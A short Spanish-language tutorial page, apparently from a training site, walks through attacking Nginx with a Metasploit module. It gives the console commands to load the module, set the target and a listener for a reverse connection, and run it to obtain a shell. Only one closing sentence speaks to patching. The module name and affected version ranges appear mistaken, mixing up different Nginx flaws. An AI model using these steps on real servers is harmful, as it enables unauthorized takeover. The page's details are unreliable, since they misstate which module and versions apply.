Hacking metasploit modulos nginx web
www.onlinetis.com
El módulo de Metasploit para Nginx Web es exploit/multi/http/nginx_chunked_encoding
. Este módulo explota una vulnerabilidad de desbordamiento de búfer en las versiones 0.5.6 a 0.7.64 y 0.8.0 a 0.8.3 de Nginx.
¿Qué es Metasploit?
Metasploit es un framework de pruebas de penetración que los profesionales de la seguridad informática utilizan para encontrar y explotar vulnerabilidades en sistemas. Proporciona una gran colección de módulos que pueden ser utilizados para diversas tareas, como la recolección de información, la explotación de vulnerabilidades y el post-explotación.
Explotación de la vulnerabilidad
La vulnerabilidad que explota este módulo radica en cómo Nginx maneja las solicitudes con codificación de transferencia "chunked" (transfer-encoding: chunked). Al enviar una solicitud HTTP maliciosa, es posible provocar un desbordamiento de búfer en el servidor Nginx, lo que permite la ejecución de código arbitrario.
Para usar este módulo en Metasploit, se deben seguir los siguientes pasos:
Cargar el módulo:
Bashmsf > use exploit/multi/http/nginx_chunked_encoding
Configurar las opciones necesarias:
Bashmsf exploit(multi/http/nginx_chunked_encoding) > set RHOSTS <dirección_IP_del_servidor> msf exploit(multi/http/nginx_chunked_encoding) > set LHOST <tu_dirección_IP> msf exploit(multi/http/nginx_chunked_encoding) > set LPORT <puerto_para_la_conexión>
RHOSTS: la dirección IP del servidor Nginx objetivo.
LHOST: tu dirección IP para recibir la conexión de retorno.
LPORT: el puerto para la conexión de retorno (payload).
Ejecutar el exploit:
Bashmsf exploit(multi/http/nginx_chunked_encoding) > run
Si el ataque tiene éxito, se obtendrá una sesión de shell en el servidor, lo que permitirá al atacante tomar el control del sistema. Es crucial que los administradores de sistemas se aseguren de que sus versiones de Nginx estén actualizadas para evitar esta y otras vulnerabilidades conocidas.